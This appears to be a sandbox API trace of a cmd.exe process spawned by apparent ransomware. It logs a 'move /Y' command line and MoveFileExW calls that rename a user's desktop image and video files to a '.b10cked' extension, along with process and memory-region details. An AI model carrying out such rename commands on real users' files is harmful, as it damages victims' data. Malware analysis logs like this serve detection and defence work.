(lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.941] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.941] GetEnvironmentStringsW () returned 0x452b38* [0231.941] FreeEnvironmentStringsW (penv=0x452b38) returned 1 [0231.941] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.942] GetConsoleOutputCP () returned 0x1b5 [0231.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.978] GetUserDefaultLCID () returned 0x409 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fd68, cchData=128 | out: lpLCData="0") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fd68, cchData=128 | out: lpLCData="0") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x24fd68, cchData=128 | out: lpLCData="1") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.983] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.983] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.984] GetConsoleTitleW (in: lpConsoleTitle=0x440910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.005] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.005] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.005] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.006] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.006] _wcsicmp (_String1="FOR", 
_String2="move") returned -7 [0232.006] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.006] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.006] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.006] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.006] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.010] GetConsoleTitleW (in: lpConsoleTitle=0x24fa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.058] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.058] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.058] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.058] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.058] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.058] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.058] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.058] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.058] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.058] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.058] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.058] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.058] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.058] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.058] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.058] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.058] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.058] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.058] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.058] _wcsicmp 
(_String1="move", _String2="CLS") returned 10 [0232.059] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.059] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.059] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.059] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.059] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.059] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.059] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.060] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.060] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.060] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.060] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.060] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.062] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f81c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f814, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f814*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.062] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 
_MaxCount=0x7) returned -3 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned 
-18 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.063] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.064] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.064] _wcsicmp (_String1="LUKOKO~1.PNG", _String2=".") returned 62 [0232.064] _wcsicmp (_String1="LUKOKO~1.PNG", _String2="..") returned 62 [0232.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukoko~1.png")) returned 0x20 [0232.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x451eb0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.064] SetErrorMode (uMode=0x0) returned 0x0 [0232.064] SetErrorMode (uMode=0x1) returned 0x0 [0232.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", nBufferLength=0x104, lpBuffer=0x24f1a4, lpFilePart=0x24f18c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", lpFilePart=0x24f18c*="LUKOKO~1.PNG") returned 0x33 [0232.064] SetErrorMode (uMode=0x0) returned 0x1 [0232.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x12 [0232.065] _wcsicmp (_String1="LUKOKO~1.PNG", _String2=".") returned 62 [0232.065] _wcsicmp (_String1="LUKOKO~1.PNG", _String2="..") returned 62 [0232.065] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukoko~1.png")) returned 0x20 [0232.065] SetErrorMode (uMode=0x0) returned 0x0 [0232.065] SetErrorMode (uMode=0x1) returned 0x0 [0232.065] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", nBufferLength=0x104, 
lpBuffer=0x24f620, lpFilePart=0x24f3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", lpFilePart=0x24f3b8*="LUKOKO~1.PNG") returned 0x33 [0232.065] SetErrorMode (uMode=0x0) returned 0x1 [0232.065] SetErrorMode (uMode=0x0) returned 0x0 [0232.065] SetErrorMode (uMode=0x1) returned 0x0 [0232.065] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", nBufferLength=0x104, lpBuffer=0x24f828, lpFilePart=0x24f3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", lpFilePart=0x24f3b8*="LUKOkovEeIsTMf0.png.b10cked") returned 0x42 [0232.065] SetErrorMode (uMode=0x0) returned 0x1 [0232.065] SetLastError (dwErrCode=0x0) [0232.065] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png.b10cked")) returned 0xffffffff [0232.065] GetLastError () returned 0x2 [0232.066] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x24ed34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ed34) returned 0x440f18 [0232.066] FindNextFileW (in: hFindFile=0x440f18, lpFindFileData=0x24ed34 | out: lpFindFileData=0x24ed34) returned 0 [0232.066] GetLastError () returned 0x12 [0232.066] FindClose (in: hFindFile=0x440f18 | out: hFindFile=0x440f18) returned 1 [0232.068] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x451c50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x451c50) returned 0x440f18 [0232.068] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", nBufferLength=0x104, lpBuffer=0x24efcc, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked", lpFilePart=0x0) returned 0x42 [0232.068] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png", nBufferLength=0x104, lpBuffer=0x24efcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png", lpFilePart=0x0) returned 0x3a [0232.068] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png")) returned 0x20 [0232.068] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png.b10cked"), dwFlags=0x3) returned 1 [0232.071] FindClose (in: hFindFile=0x440f18 | out: hFindFile=0x440f18) returned 1 [0232.072] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ef80 | out: _Buffer=" 1") returned 9 [0232.072] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.072] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ef0c | out: lpMode=0x24ef0c) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ef40 | out: lpConsoleScreenBufferInfo=0x24ef40) returned 1 [0232.146] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.147] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 
lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ef80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.147] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ef64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ef64*=0x1a) returned 1 [0232.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.190] exit (_Code=0) Process: id = "608" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 
34355 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34356 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34357 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34358 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34359 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34360 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34361 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34362 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34363 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34364 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34595 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34596 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 34597 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34598 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 34599 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 34600 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34601 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34602 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34603 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34604 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34605 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34606 start_va = 0x76d70000 end_va = 0x76e0cfff 
entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34607 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34608 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34699 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34700 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34701 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34702 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 34703 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 34704 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 34705 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 34706 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 34707 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 34708 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 846 os_tid = 0x7b8 [0231.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff74 | out: lpSystemTimeAsFileTime=0x2eff74*(dwLowDateTime=0xbdc1bba0, dwHighDateTime=0x1d440a9)) [0231.862] GetCurrentProcessId () returned 0xc4 [0231.862] GetCurrentThreadId () returned 0x7b8 [0231.862] GetTickCount () returned 0x3fcd4 [0231.862] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff6c | out: lpPerformanceCount=0x2eff6c*=28865152878) returned 1 [0231.863] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.863] __set_app_type (_Type=0x1) [0231.863] __p__fmode () returned 0x76b331f4 [0231.863] __p__commode () returned 0x76b331fc [0231.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.863] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.864] GetCurrentThreadId () returned 0x7b8 [0231.864] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b8) returned 0x38 [0231.864] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.864] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.864] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.921] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2eff04 | out: phkResult=0x2eff04*=0x0) returned 0x2 [0231.921] VirtualQuery (in: lpAddress=0x2eff3b, lpBuffer=0x2efed4, dwLength=0x1c | out: 
lpBuffer=0x2efed4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efed4, dwLength=0x1c | out: lpBuffer=0x2efed4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.921] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] 